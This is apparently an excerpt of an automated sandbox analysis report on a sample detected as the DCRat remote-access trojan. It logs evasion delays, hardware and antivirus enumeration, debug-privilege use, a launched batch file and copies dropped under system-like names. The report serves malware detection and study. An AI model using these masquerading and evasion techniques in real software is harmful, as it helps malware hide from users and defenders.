            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -599531s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -599421s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -599312s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -599203s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -599094s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -598969s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -598859s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -598750s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -598640s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -598531s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -598422s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -598312s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -598203s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 4440Thread sleep time: -30000s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 7072Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 600000
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599890
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599781
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599672
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599562
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599453
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599343
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599234
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599125
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599015
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598906
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598797
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598687
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598578
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598468
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598356
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598248
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599875
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599765
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599656
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599547
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599437
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599328
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599218
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599109
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599000
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598890
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598781
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598671
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598562
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598453
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598343
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598234
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599890
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599781
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599672
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599563
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599453
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599344
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599234
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599125
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599013
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598906
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598797
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598686
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598578
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598267
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598141
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599875
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599765
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599654
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599531
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599421
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599312
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599203
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599094
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598969
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598859
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598750
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598640
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598531
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598422
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598312
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598203
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2646534252.000000001BC6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
            Source: XPC5PMKegV.exe, 00000000.00000002.2132442923.000000001BD6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\qb&?
            Source: w32tm.exe, 0000001A.00000002.2179361537.000001B63E2D8000.00000004.00000020.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000026.00000002.2467348183.000000001B700000.00000004.00000020.00020000.00000000.sdmp, System.exe, 00000028.00000002.2528852928.000000001C050000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe" Jump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeQueries volume information: C:\Users\user\Desktop\XPC5PMKegV.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeQueries volume information: C:\Recovery\xMLVfJVxhYAkoCJ.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeQueries volume information: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe VolumeInformationJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeQueries volume information: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeQueries volume information: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeQueries volume information: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe VolumeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeQueries volume information: C:\Program Files (x86)\Microsoft.NET\System.exe VolumeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeQueries volume information: C:\Program Files (x86)\Microsoft.NET\System.exe VolumeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeQueries volume information: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe VolumeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeQueries volume information: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe VolumeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeQueries volume information: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe VolumeInformation
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeQueries volume information: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe VolumeInformation
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeQueries volume information: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe VolumeInformation
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeQueries volume information: C:\Program Files (x86)\Microsoft.NET\System.exe VolumeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeQueries volume information: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe VolumeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: StartMenuExperienceHost.exe, 00000026.00000002.2467226901.000000001B6E9000.00000004.00000020.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000026.00000002.2466914090.000000001B6B1000.00000004.00000020.00020000.00000000.sdmp, System.exe, 00000028.00000002.2528852928.000000001C050000.00000004.00000020.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2646157930.000000001BC30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

            Stealing of Sensitive Information

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000000.00000002.2128952828.000000000315F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.2323041315.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.2230480855.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000002.2231770511.00000000029BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2209851318.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2209851318.000000000331F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000002.2231770511.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2128952828.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.2231952684.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2457019815.00000000025ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2128952828.0000000003143000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.2235264042.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
